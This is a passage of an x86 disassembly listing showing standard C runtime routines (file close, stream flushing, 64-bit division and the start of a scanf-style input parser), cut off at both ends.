		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40906C
		cmp	esi, 1
		mov	eax, dword_437700
		jnz	short loc_40902F
		test	byte ptr [eax+54h], 1
		jnz	short loc_40903A

loc_40902F:				; CODE XREF: sub_40900D+1Aj
		cmp	esi, 2
		jnz	short loc_409050
		test	byte ptr [eax+2Ch], 1
		jz	short loc_409050

loc_40903A:				; CODE XREF: sub_40900D+20j
		push	2
		call	sub_40F33D
		push	1
		mov	edi, eax
		call	sub_40F33D
		cmp	eax, edi
		pop	ecx
		pop	ecx
		jz	short loc_40906C

loc_409050:				; CODE XREF: sub_40900D+25j
					; sub_40900D+2Bj
		push	esi
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0D8
		test	eax, eax
		jnz	short loc_40906C
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	edi, eax
		jmp	short loc_40906E
; ---------------------------------------------------------------------------

loc_40906C:				; CODE XREF: sub_40900D+10j
					; sub_40900D+41j ...
		xor	edi, edi

loc_40906E:				; CODE XREF: sub_40900D+5Dj
		push	esi
		call	sub_40F2BC
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		test	edi, edi
		mov	eax, dword_437700[eax*4]
		pop	ecx
		mov	byte ptr [eax+esi+4], 0
		jz	short loc_40909C
		push	edi
		call	sub_405DB9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_40909E
; ---------------------------------------------------------------------------

loc_40909C:				; CODE XREF: sub_40900D+81j
		xor	eax, eax

loc_40909E:				; CODE XREF: sub_40900D+8Dj
		pop	edi
		pop	esi
		retn
sub_40900D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4090A1	proc near		; CODE XREF: sub_4039DF+48p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422AE8
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_4090D0
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_4090C8:				; CODE XREF: sub_4090A1+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40915E
; ---------------------------------------------------------------------------

loc_4090D0:				; CODE XREF: sub_4090A1+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_4090DE
		cmp	eax, dword_4376E4
		jb	short loc_4090FF

loc_4090DE:				; CODE XREF: sub_4090A1+33j
					; sub_4090A1+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_4090C8
; ---------------------------------------------------------------------------

loc_4090FF:				; CODE XREF: sub_4090A1+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437700h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_4090DE
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_409140
		push	[ebp+arg_0]
		call	sub_40900D
		pop	ecx
		mov	[ebp+var_1C], eax
		jmp	short loc_40914F
; ---------------------------------------------------------------------------

loc_409140:				; CODE XREF: sub_4090A1+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40914F:				; CODE XREF: sub_4090A1+9Dj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_409164
		mov	eax, [ebp+var_1C]

loc_40915E:				; CODE XREF: sub_4090A1+2Aj
		call	__SEH_epilog4
		retn
sub_4090A1	endp


; =============== S U B	R O U T	I N E =======================================



sub_409164	proc near		; CODE XREF: sub_4090A1+B5p
					; DATA XREF: jlrllt49:00422B00o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_409164	endp


; =============== S U B	R O U T	I N E =======================================



sub_40916E	proc near		; CODE XREF: sub_4039DF+3Cp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	short loc_409198
		test	al, 8
		jz	short loc_409198
		push	dword ptr [esi+8]
		call	sub_403B91
		and	dword ptr [esi+0Ch], 0FFFFFBF7h
		xor	eax, eax
		pop	ecx
		mov	[esi], eax
		mov	[esi+8], eax
		mov	[esi+4], eax

loc_409198:				; CODE XREF: sub_40916E+Aj
					; sub_40916E+Ej
		pop	esi
		retn
sub_40916E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40919A	proc near		; CODE XREF: sub_4039DF+34p
					; sub_408D71+15p ...

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		mov	eax, [esi+0Ch]
		mov	ecx, eax
		and	cl, 3
		xor	ebx, ebx
		cmp	cl, 2
		jnz	short loc_4091EE
		test	ax, 108h
		jz	short loc_4091EE
		mov	eax, [esi+8]
		push	edi
		mov	edi, [esi]
		sub	edi, eax
		test	edi, edi
		jle	short loc_4091ED
		push	edi
		push	eax
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40D9E0
		add	esp, 0Ch
		cmp	eax, edi
		jnz	short loc_4091E6
		mov	eax, [esi+0Ch]
		test	al, al
		jns	short loc_4091ED
		and	eax, 0FFFFFFFDh
		mov	[esi+0Ch], eax
		jmp	short loc_4091ED
; ---------------------------------------------------------------------------

loc_4091E6:				; CODE XREF: sub_40919A+3Bj
		or	dword ptr [esi+0Ch], 20h
		or	ebx, 0FFFFFFFFh

loc_4091ED:				; CODE XREF: sub_40919A+25j
					; sub_40919A+42j ...
		pop	edi

loc_4091EE:				; CODE XREF: sub_40919A+13j
					; sub_40919A+19j
		mov	eax, [esi+8]
		and	dword ptr [esi+4], 0
		mov	[esi], eax
		pop	esi
		mov	eax, ebx
		pop	ebx
		retn
sub_40919A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4091FC	proc near		; CODE XREF: sub_40923E+69p
					; sub_40923E+84p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jnz	short loc_40920E
		push	esi
		call	sub_40923E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40920E:				; CODE XREF: sub_4091FC+7j
		push	esi
		call	sub_40919A
		test	eax, eax
		pop	ecx
		jz	short loc_40921E
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40921E:				; CODE XREF: sub_4091FC+1Bj
		test	word ptr [esi+0Ch], 4000h
		jz	short loc_40923A
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_40F60F
		pop	ecx
		pop	ecx
		neg	eax
		sbb	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40923A:				; CODE XREF: sub_4091FC+28j
		xor	eax, eax
		pop	esi
		retn
sub_4091FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40923E	proc near		; CODE XREF: sub_4091FC+Ap
					; sub_409318+2p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 004092F1 SIZE 0000001E BYTES

		push	14h
		push	offset dword_422B08
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_24], edi
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		xor	esi, esi

loc_40925F:				; CODE XREF: sub_40923E+9Bj
		mov	[ebp+var_20], esi
		cmp	esi, dword_438820
		jge	loc_4092F1
		mov	eax, dword_437800
		lea	eax, [eax+esi*4]
		cmp	[eax], edi
		jz	short loc_4092D8
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_4092D8
		push	eax
		push	esi
		call	sub_40874A
		pop	ecx
		pop	ecx
		xor	edx, edx
		inc	edx
		mov	[ebp+ms_exc.disabled], edx
		mov	eax, dword_437800
		mov	eax, [eax+esi*4]
		mov	ecx, [eax+0Ch]
		test	cl, 83h
		jz	short loc_4092D0
		cmp	[ebp+arg_0], edx
		jnz	short loc_4092B7
		push	eax
		call	sub_4091FC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4092D0
		inc	[ebp+var_1C]
		jmp	short loc_4092D0
; ---------------------------------------------------------------------------

loc_4092B7:				; CODE XREF: sub_40923E+66j
		cmp	[ebp+arg_0], edi
		jnz	short loc_4092D0
		test	cl, 2
		jz	short loc_4092D0
		push	eax
		call	sub_4091FC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4092D0
		or	[ebp+var_24], eax

loc_4092D0:				; CODE XREF: sub_40923E+61j
					; sub_40923E+72j ...
		mov	[ebp+ms_exc.disabled], edi
		call	sub_4092E0

loc_4092D8:				; CODE XREF: sub_40923E+3Aj
					; sub_40923E+42j
		inc	esi
		jmp	short loc_40925F
sub_40923E	endp


; =============== S U B	R O U T	I N E =======================================



sub_4092DB	proc near		; DATA XREF: jlrllt49:00422B2Co
		xor	edi, edi
		mov	esi, [ebp-20h]
sub_4092DB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4092E0	proc near		; CODE XREF: sub_40923E+95p
		mov	eax, dword_437800
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40879C
		pop	ecx
		pop	ecx
		retn
sub_4092E0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40923E

loc_4092F1:				; CODE XREF: sub_40923E+2Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40930F
		cmp	[ebp+arg_0], 1
		mov	eax, [ebp+var_1C]
		jz	short loc_409309
		mov	eax, [ebp+var_24]

loc_409309:				; CODE XREF: sub_40923E+C6j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40923E

; =============== S U B	R O U T	I N E =======================================



sub_40930F	proc near		; CODE XREF: sub_40923E+BAp
					; DATA XREF: jlrllt49:00422B20o
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_40930F	endp


; =============== S U B	R O U T	I N E =======================================



sub_409318	proc near		; CODE XREF: sub_4086FBp
		push	1
		call	sub_40923E
		pop	ecx
		retn
sub_409318	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_409330	proc near		; CODE XREF: sub_403ACE+29p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		mov	eax, [esp+8+arg_C]
		or	eax, eax
		jnz	short loc_409352
		mov	ecx, [esp+8+arg_8]
		mov	eax, [esp+8+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+8+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_409393
; ---------------------------------------------------------------------------

loc_409352:				; CODE XREF: sub_409330+8j
		mov	ecx, eax
		mov	ebx, [esp+8+arg_8]
		mov	edx, [esp+8+arg_4]
		mov	eax, [esp+8+arg_0]

loc_409360:				; CODE XREF: sub_409330+3Aj
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_409360
		div	ebx
		mov	esi, eax
		mul	[esp+8+arg_C]
		mov	ecx, eax
		mov	eax, [esp+8+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40938E
		cmp	edx, [esp+8+arg_4]
		ja	short loc_40938E
		jb	short loc_40938F
		cmp	eax, [esp+8+arg_0]
		jbe	short loc_40938F

loc_40938E:				; CODE XREF: sub_409330+4Ej
					; sub_409330+54j
		dec	esi

loc_40938F:				; CODE XREF: sub_409330+56j
					; sub_409330+5Cj
		xor	edx, edx
		mov	eax, esi

loc_409393:				; CODE XREF: sub_409330+20j
		pop	esi
		pop	ebx
		retn	10h
sub_409330	endp


; =============== S U B	R O U T	I N E =======================================



sub_409398	proc near		; CODE XREF: sub_409427+3CDp
					; sub_409427+447p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esi]
		cmp	[esp+arg_0], eax
		jnz	short loc_4093E8
		mov	ecx, [edi]
		cmp	ecx, [esp+arg_4]
		push	2
		push	eax
		jnz	short loc_4093D7
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jnz	short loc_4093BB

loc_4093B8:				; CODE XREF: sub_409398+4Aj
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4093BB:				; CODE XREF: sub_409398+1Ej
		mov	eax, [esp+arg_8]
		mov	dword ptr [eax], 1
		push	dword ptr [esi]
		push	[esp+4+arg_4]
		push	dword ptr [edi]
		call	sub_4081B0
		add	esp, 0Ch
		jmp	short loc_4093E6
; ---------------------------------------------------------------------------

loc_4093D7:				; CODE XREF: sub_409398+11j
		push	ecx
		call	sub_407DCD
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_4093B8
		mov	[edi], eax

loc_4093E6:				; CODE XREF: sub_409398+3Dj
		shl	dword ptr [esi], 1

loc_4093E8:				; CODE XREF: sub_409398+6j
		xor	eax, eax
		inc	eax
		retn
sub_409398	endp


; =============== S U B	R O U T	I N E =======================================



sub_4093EC	proc near		; CODE XREF: sub_409402+7p
					; sub_409427+2E1p ...
		dec	dword ptr [edx+4]
		js	short loc_4093FA
		mov	ecx, [edx]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[edx], ecx
		retn
; ---------------------------------------------------------------------------

loc_4093FA:				; CODE XREF: sub_4093EC+3j
		push	edx
		call	sub_40A24D
		pop	ecx
		retn
sub_4093EC	endp


; =============== S U B	R O U T	I N E =======================================



sub_409402	proc near		; CODE XREF: sub_409427+14Fp
					; sub_409427+2D3p

arg_0		= dword	ptr  4

		push	ebx

loc_409403:				; CODE XREF: sub_409402+1Fj
		mov	edx, [esp+4+arg_0]
		inc	dword ptr [esi]
		call	sub_4093EC
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409423
		movzx	eax, bl
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jnz	short loc_409403

loc_409423:				; CODE XREF: sub_409402+11j
		mov	eax, ebx
		pop	ebx
		retn
sub_409402	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=18Ch


sub_409427	proc near		; DATA XREF: sub_403B72+10o

var_1FC		= dword	ptr -1FCh
var_1F8		= dword	ptr -1F8h
var_1F0		= dword	ptr -1F0h
var_1EC		= byte ptr -1ECh
var_1E8		= dword	ptr -1E8h
var_1E4		= dword	ptr -1E4h
var_1E0		= dword	ptr -1E0h
var_1DC		= byte ptr -1DCh
var_1DB		= byte ptr -1DBh
var_1D8		= dword	ptr -1D8h
var_1D4		= dword	ptr -1D4h
var_1D0		= dword	ptr -1D0h
var_1C9		= byte ptr -1C9h
var_1C8		= dword	ptr -1C8h
var_1C4		= dword	ptr -1C4h
var_1C0		= dword	ptr -1C0h
var_1BC		= dword	ptr -1BCh
var_1B8		= dword	ptr -1B8h
var_1B4		= dword	ptr -1B4h
var_1B0		= dword	ptr -1B0h
var_1AC		= dword	ptr -1ACh
var_1A8		= dword	ptr -1A8h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_1A2		= byte ptr -1A2h
var_1A1		= byte ptr -1A1h
var_1A0		= dword	ptr -1A0h
var_19A		= byte ptr -19Ah
var_199		= byte ptr -199h
var_198		= dword	ptr -198h
var_191		= byte ptr -191h
var_190		= dword	ptr -190h
var_189		= byte ptr -189h
var_188		= dword	ptr -188h
var_184		= byte ptr -184h
var_24		= byte ptr -24h
var_19		= byte ptr -19h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-18Ch]
		sub	esp, 1FCh
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+18Ch+var_4], eax
		mov	eax, [ebp+18Ch+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+18Ch+arg_0]
		xor	ebx, ebx
		push	edi
		mov	edi, [ebp+18Ch+arg_4]
		cmp	edi, ebx
		mov	[ebp+18Ch+var_1E4], eax
		lea	eax, [ebp+18Ch+var_184]
		mov	[ebp+18Ch+var_1A0], esi
		mov	[ebp+18Ch+var_1B4], edi
		mov	[ebp+18Ch+var_1B0], eax
		mov	[ebp+18Ch+var_1D8], 15Eh
		mov	[ebp+18Ch+var_1D0], ebx
		mov	[ebp+18Ch+var_1E8], ebx
		mov	[ebp+18Ch+var_190], ebx
		jnz	short loc_40949C

loc_40947C:				; CODE XREF: sub_409427+77j
					; sub_409427+C6j ...
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40A05C
; ---------------------------------------------------------------------------

loc_40949C:				; CODE XREF: sub_409427+53j
		cmp	esi, ebx
		jz	short loc_40947C
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_40953B
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_4094E4
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_4094E4
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_4094E9
; ---------------------------------------------------------------------------

loc_4094E4:				; CODE XREF: sub_409427+8Dj
					; sub_409427+99j
		mov	eax, offset dword_424BD0

loc_4094E9:				; CODE XREF: sub_409427+BBj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40947C
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_409529
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_409529
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437700h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40952E
; ---------------------------------------------------------------------------

loc_409529:				; CODE XREF: sub_409427+D2j
					; sub_409427+DEj
		mov	eax, offset dword_424BD0

loc_40952E:				; CODE XREF: sub_409427+100j
		test	byte ptr [eax+24h], 80h
		jnz	loc_40947C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40953B:				; CODE XREF: sub_409427+7Dj
		push	[ebp+18Ch+arg_8]
		lea	ecx, [ebp+18Ch+var_1F8]
		call	sub_402CAD
		mov	al, [edi]
		test	al, al
		mov	[ebp+18Ch+var_1A1], bl
		mov	[ebp+18Ch+var_188], ebx
		mov	[ebp+18Ch+var_1C8], ebx
		jz	loc_40A04C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40955F:				; CODE XREF: sub_409427+BC2j
		movzx	eax, al
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jz	short loc_4095A0
		push	[ebp+18Ch+var_1A0]
		dec	[ebp+18Ch+var_188]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_409402
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40958C
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40958C:				; CODE XREF: sub_409427+158j
					; sub_409427+172j
		inc	edi
		movzx	eax, byte ptr [edi]
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jnz	short loc_40958C
		jmp	loc_409FE5
; ---------------------------------------------------------------------------

loc_4095A0:				; CODE XREF: sub_409427+144j
		cmp	byte ptr [edi],	25h
		jnz	loc_409F8D
		xor	eax, eax
		mov	[ebp+18Ch+var_1E0], eax
		mov	[ebp+18Ch+var_1C9], al
		mov	[ebp+18Ch+var_1A8], eax
		mov	[ebp+18Ch+var_1B8], eax
		mov	[ebp+18Ch+var_198], eax
		mov	[ebp+18Ch+var_1A4], al
		mov	[ebp+18Ch+var_1A3], al
		mov	[ebp+18Ch+var_199], al
		mov	[ebp+18Ch+var_189], al
		mov	[ebp+18Ch+var_1A2], al
		mov	[ebp+18Ch+var_191], al
		mov	[ebp+18Ch+var_19A], 1
		mov	[ebp+18Ch+var_1D4], eax
		xor	esi, esi

loc_4095D5:				; CODE XREF: sub_409427+279j
		inc	edi
		movzx	ebx, byte ptr [edi]
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	short loc_4095FC
		mov	eax, [ebp+18Ch+var_198]
		inc	[ebp+18Ch+var_1B8]
		imul	eax, 0Ah
		lea	eax, [eax+ebx-30h]
		mov	[ebp+18Ch+var_198], eax
		jmp	loc_40969C
; ---------------------------------------------------------------------------

loc_4095FC:				; CODE XREF: sub_409427+1BEj
		cmp	ebx, 4Eh
		jg	short loc_409672
		jz	loc_40969C
		cmp	ebx, 2Ah
		jz	short loc_40966D
		cmp	ebx, 46h
		jz	loc_40969C
		cmp	ebx, 49h
		jz	short loc_409624
		cmp	ebx, 4Ch
		jnz	short loc_409681
		inc	[ebp+18Ch+var_19A]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409624:				; CODE XREF: sub_409427+1F1j
		mov	cl, [edi+1]
		cmp	cl, 36h
		jnz	short loc_409641
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	34h
		jnz	short loc_409641

loc_409634:				; CODE XREF: sub_409427+265j
		inc	[ebp+18Ch+var_1D4]
		mov	edi, eax
		mov	[ebp+18Ch+var_1C0], esi
		mov	[ebp+18Ch+var_1BC], esi
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409641:				; CODE XREF: sub_409427+203j
					; sub_409427+20Bj
		cmp	cl, 33h
		jnz	short loc_409652
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	32h
		jnz	short loc_409652
		mov	edi, eax
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409652:				; CODE XREF: sub_409427+21Dj
					; sub_409427+225j
		cmp	cl, 64h
		jz	short loc_40969C
		cmp	cl, 69h
		jz	short loc_40969C
		cmp	cl, 6Fh
		jz	short loc_40969C
		cmp	cl, 78h
		jz	short loc_40969C
		cmp	cl, 58h
		jnz	short loc_409681
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_40966D:				; CODE XREF: sub_409427+1E3j
		inc	[ebp+18Ch+var_199]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409672:				; CODE XREF: sub_409427+1D8j
		cmp	ebx, 68h
		jz	short loc_409696
		cmp	ebx, 6Ch
		jz	short loc_409686
		cmp	ebx, 77h
		jz	short loc_409691

loc_409681:				; CODE XREF: sub_409427+1F6j
					; sub_409427+242j
		inc	[ebp+18Ch+var_189]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409686:				; CODE XREF: sub_409427+253j
		lea	eax, [edi+1]
		cmp	byte ptr [eax],	6Ch
		jz	short loc_409634
		inc	[ebp+18Ch+var_19A]

loc_409691:				; CODE XREF: sub_409427+258j
		inc	[ebp+18Ch+var_191]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409696:				; CODE XREF: sub_409427+24Ej
		dec	[ebp+18Ch+var_19A]
		dec	[ebp+18Ch+var_191]

loc_40969C:				; CODE XREF: sub_409427+1D0j
					; sub_409427+1DAj ...
		cmp	[ebp+18Ch+var_189], 0
		jz	loc_4095D5
		cmp	[ebp+18Ch+var_199], 0
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_4096BD
		mov	eax, [ebp+18Ch+var_1E4]
		mov	esi, [eax]
		mov	[ebp+18Ch+var_1FC], eax
		add	eax, 4
		mov	[ebp+18Ch+var_1E4], eax

loc_4096BD:				; CODE XREF: sub_409427+286j
		cmp	[ebp+18Ch+var_191], 0
		mov	[ebp+18Ch+var_1C4], esi
		mov	[ebp+18Ch+var_189], 0
		jnz	short loc_4096DC
		mov	al, [edi]
		cmp	al, 53h
		jz	short loc_4096D8
		cmp	al, 43h
		mov	[ebp+18Ch+var_191], 0FFh
		jnz	short loc_4096DC

loc_4096D8:				; CODE XREF: sub_409427+2A7j
		mov	[ebp+18Ch+var_191], 1

loc_4096DC:				; CODE XREF: sub_409427+2A1j
					; sub_409427+2AFj
		movzx	ebx, byte ptr [edi]
		or	ebx, 20h
		cmp	ebx, 6Eh
		mov	[ebp+18Ch+var_1AC], ebx
		jz	short loc_40971F
		cmp	ebx, 63h
		jz	short loc_409702
		cmp	ebx, 7Bh
		jz	short loc_409702
		push	[ebp+18Ch+var_1A0]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_409402
		pop	ecx
		jmp	short loc_40970D
; ---------------------------------------------------------------------------

loc_409702:				; CODE XREF: sub_409427+2C6j
					; sub_409427+2CBj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC

loc_40970D:				; CODE XREF: sub_409427+2D9j
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_40A019
		mov	esi, [ebp+18Ch+var_1C4]
		mov	edi, [ebp+18Ch+var_1B4]

loc_40971F:				; CODE XREF: sub_409427+2C1j
		mov	ecx, [ebp+18Ch+var_1B8]
		test	ecx, ecx
		jz	short loc_409730
		cmp	[ebp+18Ch+var_198], 0
		jz	loc_409FF1

loc_409730:				; CODE XREF: sub_409427+2FDj
		cmp	ebx, 6Fh
		jg	loc_409B3C
		jz	loc_409D67
		cmp	ebx, 63h
		jz	loc_409A2E
		push	64h
		pop	eax
		cmp	ebx, eax
		jz	loc_409D67
		jle	loc_409B66
		cmp	ebx, 67h
		jle	short loc_409796
		cmp	ebx, 69h
		jz	short loc_40977E
		cmp	ebx, 6Eh
		jnz	loc_409B66
		cmp	[ebp+18Ch+var_199], 0
		mov	edi, [ebp+18Ch+var_188]
		jz	loc_409F61
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_40977E:				; CODE XREF: sub_409427+33Aj
		mov	[ebp+18Ch+var_1AC], eax

loc_409781:				; CODE XREF: sub_409427+734j
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	loc_409C4F
		mov	[ebp+18Ch+var_1A3], 1
		jmp	loc_409C54
; ---------------------------------------------------------------------------

loc_409796:				; CODE XREF: sub_409427+335j
		xor	ebx, ebx
		cmp	[ebp+18Ch+var_190], 2Dh
		jnz	short loc_4097A7
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [eax],	2Dh
		inc	ebx
		jmp	short loc_4097AD
; ---------------------------------------------------------------------------

loc_4097A7:				; CODE XREF: sub_409427+375j
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_4097BE

loc_4097AD:				; CODE XREF: sub_409427+37Ej
		dec	[ebp+18Ch+var_198]
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax

loc_4097BE:				; CODE XREF: sub_409427+384j
		cmp	[ebp+18Ch+var_1B8], 0
		jnz	short loc_4097C8
		or	[ebp+18Ch+var_198], 0FFFFFFFFh

loc_4097C8:				; CODE XREF: sub_409427+39Bj
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_409815
; ---------------------------------------------------------------------------

loc_4097CE:				; CODE XREF: sub_409427+3F7j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_409820
		mov	al, byte ptr [ebp+18Ch+var_190]
		mov	ecx, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_409815:				; CODE XREF: sub_409427+3A5j
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_4097CE

loc_409820:				; CODE XREF: sub_409427+3AFj
		mov	eax, [ebp+18Ch+var_1F8]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		cmp	al, byte ptr [ebp+18Ch+var_190]
		mov	[ebp+18Ch+var_1A4], al
		jnz	loc_4098D6
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4098D6
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ecx, [ebp+18Ch+var_1B0]
		mov	[ebp+18Ch+var_190], eax
